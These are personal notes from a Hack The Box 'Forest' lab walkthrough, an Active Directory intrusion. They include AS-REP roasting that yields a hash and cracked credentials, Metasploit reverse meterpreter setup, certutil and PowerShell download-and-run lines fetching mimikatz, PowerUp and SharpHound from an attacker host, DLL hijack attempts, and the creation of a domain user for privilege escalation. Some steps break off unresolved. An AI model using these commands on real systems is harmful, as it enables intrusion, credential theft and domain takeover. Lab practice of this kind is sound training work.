Forest

Kerberos

Kerberoasting

5985

evil winmr

Windows Server 2016 Standard 14393
SMB guest but enabled and required

brute kerberos?

/opt/kerbrute userenum --dc 10.10.10.161 -d htb.local -v /opt/usernames/statistically-likely-usernames/service-accounts.txt --hash-file asrepHashes.txt | tee kerbrute.out

find only valid users:

cat kerbrute.out | grep '+' | awk '{print $7}' > usernames.txt

UPDATED:

cat kerbrute.out | grep 'VALID USERNAME:'

Kerberoast no password:

GetNPUsers.py -dc-ip 10.10.10.161 -no-pass htb.local/administrator

Kerberoast with no password or user:

GetNPUsers.py -dc-ip 10.10.10.161 htb.local/ -request

GetNPUsers.py htb.local/ -dc-ip 10.10.10.161 -request

We get a hash:

$krb5asrep$23$svc-alfresco@HTB.LOCAL:3b3cc338811566fd19e82e7c57ee232f$9c4f137c5b0738556de1832383894cf5edd90f9439b6fb4bc3424a9c0dc6b8cff364c5c2ee2d0e3852850667b4491f76db87aae0d55f458db0954a501209f99afee8ed528e4f68bd69efeb1ef13b6c24e950f6acaf3ca7b1c020866dfd04b636558ce46719d564a712364fd22a4ed769080c072b417f26dbd4b08621e6c2f1c4b57ad8d5212e5d4a14813de464b9060fb17bf2b27249d21ad7069fb06439d11aad1fef39e611f3d500e998df7a3e539c3051cee747b61269cc513c3654cf0e26a35f76ad1e44810f377cb5f9d04d0b302cf0451e6b4ad355b8531771b3959b1fa775a3aeba68

user:

svc-alfresco:s3rvice

kerbroast with credentials:

GetUserSPNs.py htb.local/svc-alfresco:s3rvice -dc-ip 10.10.10.161 -request

nothing!

share enum with credentials:

cme smb -u 'svc-alfresco' -p 's3rvice' --shares 10.10.10.161

cme smb 10.10.10.161 -u 'htb.local\svc-alfresco' -p 's3rvice' --local-auth --shares

Nothing!

Evil winrm time:

evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

migrate to metasploit using web delivery:

msfconsole
use exploit/multi/script/web_delivery
set lhost tun0
set payload windows/x64/meterpreter/reverse_http
set target 2 #PSH
set srvport 3999
run -j
sessions 1

no getsystem, no incognito → impersonate

local suggester:

use post/multi/recon/local_exploit_suggester

result:

 1   exploit/windows/local/bypassuac_dotnet_profiler                Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/bypassuac_sdclt                          Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/bypassuac_sluihijack                     Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/cve_2019_1458_wizardopium                Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The target appears to be vulnerable. Vulnerable Windows 10 v1607 build detected!                                                                                                                                   
 7   exploit/windows/local/cve_2020_1048_printerdemon               Yes                      The target appears to be vulnerable.
 8   exploit/windows/local/cve_2020_1337_printerdemon               Yes                      The target appears to be vulnerable.
 9   exploit/windows/local/cve_2021_40449                           Yes                      The target appears to be vulnerable. Vulnerable Windows 10 v1607 build detected!                                                                                                                                   
 10  exploit/windows/local/cve_2022_21999_spoolfool_privesc         Yes                      The target appears to be vulnerable.
 11  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.
 12  exploit/windows/local/tokenmagic                               Yes                      The target appears to be vulnerable.

x64:

set payload windows/x64/meterpreter/reverse_tcp

transfer over PowerUp and winpeas:

certutil -urlcache -f http://10.10.14.23:81/winPEASx64.exe winpeas.exe

echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.23:81/PowerUp.ps1') | powershell -noprofile -

we found an abuse

PowerUp abuse:

send it over:

certutil -urlcache -f http://10.10.14.23:81/PowerUp.ps1 PowerUp.ps1

powershell -ep bypass
. .\PowerUp.ps1

huh

default last liner:

Invoke-AllChecks

Write-HijackDll -DllPath 'C:\Users\svc-alfresco\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

run it:

Start-Process -FilePath "C:\Users\svc-alfresco\AppData\Local\Temp>CFncoaiZU.exe"

Start-Process -FilePath "C:\users\svc-alfresco\desktop>PowerUp.ps1"

meterpreter powershell:

powershell_execute 'Start-Process -FilePath "C:\Users\svc-alfresco\AppData\Local\Temp\CFncoaiZU.exe"'

Mimikatz:

certutil -urlcache -f http://10.10.14.23:81/mimikatz.exe mk.exe

go back to desktop:

cd c:\users\svc-alfresco\desktop

Send over Sherlock:

echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.23:81/Sherlock.ps1') | powershell -noprofile -

Nothing! Bloodhound:

sudo neo4j console

cd ~/.local/pipx/venvs/crackmapexec/bin/

./bloodhound-python -d htb.local -u 'svc-alfresco' -p 's3rvice' -ns 10.10.10.161 --dns-timeout 30 -c all --zip

Doesn’t work. Need to fix it with SharpHound

#Updated with dnschef:

./dnschef.py --fakeip 10.10.10.161

bloodhoundpy command:

sudo /home/kali/.local/pipx/venvs/crackmapexec/bin/bloodhound-python -d htb.local -u 'svc-alfresco' -p 's3rvice' -ns 127.0.0.1 -c all --zip

Take the outputs from the dnschef tab and add them to:

sudo mousepad dnschef.ini

under SRV (or whatever they are)

output:

(17:31:42) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.gc._msdcs.htb.local
(17:31:42) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.gc._msdcs.htb.local.localdomain
(17:31:42) [*] 127.0.0.1: proxying the response of type 'SRV' for _kerberos._tcp.dc._msdcs.htb.local

condensed:

_ldap._tcp.gc._msdcs.htb.local
_ldap._tcp.gc._msdcs.htb.local.localdomain
_kerberos._tcp.dc._msdcs.htb.local

how to make them work on dnschef:

_ldap._tcp.gc._msdcs.htb.local
#becomes
*.*.*._msdcs.htb.local=0 5 5060 dc1.htb.local

[SRV]
; FORMAT: priority weight port target
*.*.thesprawl.org=0 5 5060 sipserver.fake.com
*.*.*._msdcs.htb.local=0 5 5060 dc1.htb.local
*.*.*.*.htb.local.localdomain=0 5 5060 dc1.htb.local
*.*.*.htb.local=0 5 5060 dc1.htb.local

then run command:

./dnschef.py --fakeip 10.10.10.161 --file dnschef.ini

and bloodhound py it:

sudo /home/kali/.local/pipx/venvs/crackmapexec/bin/bloodhound-python -d htb.local -u 'svc-alfresco' -p 's3rvice' -ns 127.0.0.1 -c all --zip

####################################

ldapdomain:

sudo ldapdomaindump ldaps://10.10.10.161 -u 'htb.local\svc-alfresco' -p s3rvice

Nothing.

Send over SharpHound:

certutil -urlcache -f http://10.10.14.23:81/SharpHound.exe sharpH.exe

run sharphound to get the zip:

.\sharpH.exe -c all

download the zip from meterpreter:

download C:\\Users\\svc-alfresco\\Desktop\\20240427041526_BloodHound.zip ~//Desktop//HackTheBox//Forest

unzip then upload to bloodhound:

unzip 20240427041526_BloodHound.zip

computers stuck. Analysis says we have-

##########################################################################

CanPSRemote = Remote Manage Users

Source: Lateral Movement (riccardoancarani.github.io)

CanPSRemote – BloodHound (bloodhoundenterprise.io)

What groups are we part of?

whoami /groups

add bimmer user:

net user bimmer password /add /domain

add them to Exchange Permissions:

net group "Exchange Windows Permissions" /add bimmer

HTB: Forest | 0xdf hacks stuff